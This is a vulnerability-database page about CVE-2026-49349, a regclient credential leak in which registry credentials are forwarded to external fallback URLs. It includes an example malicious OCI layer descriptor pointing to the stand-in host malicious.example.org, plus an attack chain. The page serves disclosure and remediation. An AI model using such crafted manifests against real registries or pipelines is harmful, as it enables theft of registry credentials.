Skip to main content

regclient CVE-2026-49349

MEDIUM
Insufficiently Protected Credentials (CWE-522)
2026-06-26 https://github.com/regclient/regclient GHSA-qvqc-4c52-x6qp
6.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.8 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N
vuln.today AI
6.8 MEDIUM

Network-delivered via crafted manifest (AV:N), attacker needs registry control (PR:L), victim must pull image (UI:R), credentials exfiltrated outside originating security domain (S:C), full secret disclosure (C:H), no integrity or availability impact.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 26, 2026 - 23:16 vuln.today
Analysis Generated
Jun 26, 2026 - 23:16 vuln.today

DescriptionGitHub Advisory

Credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs.

Example attack

A malicious registry serves an OCI image manifest containing a layer descriptor with a urls field pointing to an attacker controlled host:

json
{
  "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
  "digest": "sha256:...",
  "size": 1024,
  "urls": ["https://malicious.example.org/blobs/sha256/..."]
}

When regclient fetches the image and the primary blob request to the registry fails, it falls back to the URLs in the layer descriptor. If the external server requests authentication, regclient would send the credentials for the original registry server.

Timeline

  • 2026-05-25: Advisory submitted
  • 2026-05-26: Fix released

Credit

Theodoros Lampropoulos, Threat Detection Engineer, Odyssey Cyber Security

AnalysisAI

Registry credential leakage in regclient (Go OCI library) versions up to and including 0.11.4 exposes authentication secrets to attacker-controlled external servers via crafted OCI image manifests. When regclient fetches a blob layer and the primary registry request fails, it falls back to external URLs defined in the manifest's layer descriptor urls field; if the external server issues an HTTP authentication challenge, regclient forwards the original registry credentials to that host. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Attacker deploys malicious registry or compromises permissive registry
Delivery
Craft OCI manifest with attacker-controlled layer URLs field
Exploit
Victim pulls image via regclient <= 0.11.4
Install
Primary blob fetch to registry fails, fallback triggered
C2
Attacker's server issues HTTP 401 auth challenge
Execute
regclient forwards registry credentials to attacker host
Impact
Attacker captures credentials for downstream abuse

Vulnerability AssessmentAI

Exploitation Exploitation requires all of the following: (1) the victim must be using regclient version 0.11.4 or earlier - other OCI client implementations are not affected; (2) the attacker must control a malicious registry server, a malicious blob store, or a legitimate registry that does not restrict external URLs in layer descriptor `urls` fields; (3) the victim must actively pull an OCI image from that registry (UI:R per CVSS), which triggers regclient's blob fetch logic; (4) the primary blob fetch to the originating registry must fail, activating the `urls` fallback path; and (5) the attacker's external server must issue an HTTP authentication challenge to cause credential forwarding. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 6.8 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N) accurately reflects the key risk dimensions. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who controls a malicious container registry publishes an OCI image manifest in which a layer descriptor includes a `urls` field pointing to an attacker-operated HTTPS server. When a developer or automated CI/CD pipeline using regclient <= 0.11.4 pulls that image, regclient attempts the primary blob fetch from the registry; if the registry causes that fetch to fail, regclient follows the fallback URL. …
Remediation Upgrade regclient to version 0.11.5 or later, which addresses the credential leakage by restricting credential forwarding to the originating registry domain. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-49349 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy